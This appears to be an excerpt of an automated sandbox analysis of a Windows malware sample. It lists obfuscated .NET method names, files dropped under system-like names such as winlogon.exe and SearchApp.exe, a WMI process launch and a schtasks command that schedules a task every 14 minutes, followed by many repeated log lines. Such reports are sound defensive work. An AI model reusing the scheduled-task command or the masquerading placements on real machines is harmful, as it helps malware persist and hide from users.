            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RMQDAIA2iyIGcdEx9Di.cs High entropy of concatenated method names: 'iGLw3BR0cO', 'A1IwG96o6c', 'v51wRvk3Vr', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'XsCwsFtbOr'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, steC9eeroYoeceZeUVn.cs High entropy of concatenated method names: 'RJXyYkUU5O', 'QSlVCcZVbPNep3vbSId', 'uIsFUPZN52ROjIvl553', 'tq2EfLZn8Me8eFeuXyk', 'O6duNDZbHnkJLNUgEdf', 'ivN25jZgT2MSFC7dvPe', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, mrXjmJ6FYcUctx50l3k.cs High entropy of concatenated method names: '_7zt', 'a6laYXAsVB', 'olKaoDbB5C', 'dt1aDxHDW3', 'oXBaQoE4D5', 'OcbajPjOh5', 'D3XavsRH2c', 'Mf8t8qBFm9Eq89eI327', 'NNfNvSBhD1OxuNOedlr', 'lrCR6LB1lNEEpabYoJV'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, PTAlGt69bNQ8InDWwf9.cs High entropy of concatenated method names: 'sZ1a6EFHYg', 'FsgaE17SdB', 'zimaAoYXmA', 'GEPfCSBfOxtfbuBfbJF', 'b49WbbB4jViseV0Z7KV', 'VTxpGjBoEwIYU8B8UvY', 'UkBL8FBMGstulj6Osby', 'n8Hny7BQo68PSUkP42T', 'E1tEE7BvQWgurIY0VQB', 'RiwWh7B0nshS7T6EAKW'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, QJW2jSyZhvc7pEkiHdp.cs High entropy of concatenated method names: 'xYSAXTaeha', 'l00A3tOonn', 'KAf5ny4XEO4pcjQgHma', 'r5L02S47HIoU62qYqLT', 'C3SUYD4trscj0afPwvn', 'iwWvpH4IesmUospT3Dk', 'nAqA9uMGpD', 'p1NrD7QODSnHCu8KprX', 'Xa94TYQH6PFlRnOvYP7', 'uHfbcu4ummUP6WlENSR'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, Ky65tBEJqfYe2SD64yu.cs High entropy of concatenated method names: 'NJUl6U6mhN', 'IwxlEZaijo', 'HiNlAOLLki', 'fLiliseEoG', 'aLQlXCWLD8', 'IFnl3KV4lZ', 'xy5lG1ARtP', 'XumlR5OmZ0', 'pQ1lsZUpFo', 'BxIlajYJVc'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, ySY8PQMLO98W8injIB.cs High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'oaXdLp2lEgc8GaQfrAc', 'BS48u92ZR2GpAHmnqQs', 'ogYVtu2KD1sCqWujZpE', 'rD5kGF2rHTGoCxcQNZT', 'gIV4gi2RvK6q5A2dNfW', 'Hunq922oGkY9D5OAv4L'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, Hnglq4Z4f7vvXRtYro.cs High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'px58m7x7pLtr3rVlykO', 'fQwCVZxUMLCIDmOdXvY', 'TNSBuExmt0wlyOHEPwx', 'fJHJvXxuoeBc3ckYehp', 'WgMXI9xz9e35ss74hVr', 'flfjb5nOBkWObSENg7P'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, ulIuwAEcJv1dBQ3nKmW.cs High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, rqnYLEiwDI3fwWnpGb.cs High entropy of concatenated method names: 'NYLSEwDI3', 'hwKK1FkCWW9On6rRZZ', 'A9hJN6iXpcGxr9d7ZM', 'Sntq9gP6OTEQ15WTWY', 'UU6DkOWWArEeqaI2kk', 'L13yDO8UKft3a7PkDV', 'jgMylIC5R', 'SQJ0m8QLN', 'rFW6s8lLj', 'XAJEFKkF5'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, SFAZZmeBFFtetSdvveD.cs High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'znlsQcN9FsH8wC3G4Vy', 'paYFRjNeDaoofc2dDjk', 'rIUW1jNpaW62VDbXGLh', 'a7Oa1QNClQYWmhE2oPf', 'ugRC7XNJNUgbVu4k7gH', 'WpW92xNATxnADMEsgZB'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, aJMlxKAqIi1FWf8OsKw.cs High entropy of concatenated method names: 'Sm2WjOUGwc', '_1kO', '_9v4', '_294', 'kRmWvQ02WO', 'euj', 'msHWPCxuGH', 'zLjWlQcX2Q', 'o87', 'RcbWbInxjy'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, olvTihy2Cmx8PY3jcud.cs High entropy of concatenated method names: 'sLH6mqlUtv', 'dX868Dg6Jw', 'dRT6z9AuKH', 'LJaEgBLXLN', 'FMxEeOVqg6', 'wVTEyX7ISm', 'EQKE0uxc5k', 'G30E6EnDda', 'FFsEEFthKY', 'O5HTNBMXD0hjrUbVp6Y'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, TV5TmIe3Hqvt4qv0b7O.cs High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'sVBEHwNNMssAf7G8ihH', 'V8wxggNgRMelvFWGwPq', 'hXxIboNDn4iCqLXVLAB', 'ft1Z18NSGp82Sbjy3Ks', 'NDTr8lNlky80QUf7drY', 'qbFS9SNZuYU6ymue1On'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, S2cyv6iRAHria5jC7vE.cs High entropy of concatenated method names: 'nPxg8dFFgWdhG', 'hZldWKsoVPMDWlyS7yT', 'UpR9nVsMLkKQHSFU6eF', 'tSUSspsfWNY7FVDPK1S', 'Xu3XDys4E8cIYokMlE3', 'H0ESvBsQbROGVx9I42M', 'AaGPkWsrXimIrWWSfkc', 'YMkPdWsRS6ONBS7rosB', 'xSUrQrsvR0tGZZ6u8vW', 'f7efC0s0701TEslsw4o'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, vyYwpEAvogK6mJJohqC.cs High entropy of concatenated method names: 'IGD', 'CV5', 'v5IbPonVVY', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, h3ttlAE1prhLd1Vi5C0.cs High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'rVUlvCDkhV', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, KcHRCg0Taeo5cK48nmF.cs High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'fwnGRj0KF6', 'OqgaNMbb7N', 'r0oGs9fRya', 'flCam6agKQ', 'anA3pihYvqJOPuypxEf', 'utw43Sh9lWA6YS6AmTJ', 'yrKP6hhETTJb5wTy9ET'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, xAEJmkyuNbNpTsoB8bj.cs High entropy of concatenated method names: 'OPAEWEJmkN', 'v6F2GpfmtxZHnHiVnI1', 'axeVjlfuTbvAyUcBPKK', 'hirFPLf7cgamKjXvOXD', 'EHAI2jfUGuf2vT2TysE', 'BAi5ZVfz38QkA2yXg4A', 'burOv14O1Hoj0d14t9C', 'apYrQN4Hg64idqdeHQA', 'UJIbab42jDMd4xwgxQw', 'CgKKrI4xR4C2gO1HrZl'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, T6KrWZeYLExIGM2xDjC.cs High entropy of concatenated method names: 'LWoeWo40ub', 'gs9SNXg4O3DKFeeCgSM', 'Nlrmf0gQEo8MFi96gYK', 'BOK54EgMfHTAUlYgT3r', 'qDZTDAgfxu03NLlg1IP', 'ApDXAmgv3bRnAX0oOCm', 'KrQdyNg0gSTKWxivEpK', 'p6m4UJg13O5j0OBMToW', 'pvoBnFgdEiAUyr9G4Ea', 'f28'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, J4m9cdAyduM4lXJjpGQ.cs High entropy of concatenated method names: 'pFJbX8oEwD', 'IBrb3WNY84', '_8r1', 'v3abGuI0xn', 'dQpbR9glwO', 'zfYbsby9Ax', 'vWQbaSdrmO', 'caU35PeM65ovfxFe30c', 'MNWwjtefvU7jDhv1BEi', 'WLBgQie4cDBFxLwM7Cd'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, zAYVLbewkKbSB8fa4Cv.cs High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'Wbqw67guF3x3fUxotCB', 'AI89GGgzVTwjipxZgjR', 'ky6arcDOrDC0lFSnela', 'HXerahDHm6c33U8QWQE', 'si68uLD24TUojkPFEiW', 'quxdvCDxuhKbFoe3THf'

            Persistence and Installation Behavior

            Source: C:\serversessionmonitor\blockfont.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: unknown Executable created and started: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Program Files (x86)\Windows Portable Devices\winlogon.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Recovery\SearchApp.exe
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe File created: C:\serversessionmonitor\blockfont.exe
            Source: C:\serversessionmonitor\blockfont.exe File created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe

            Boot Survival

            Source: C:\serversessionmonitor\blockfont.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\serversessionmonitor\blockfont.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
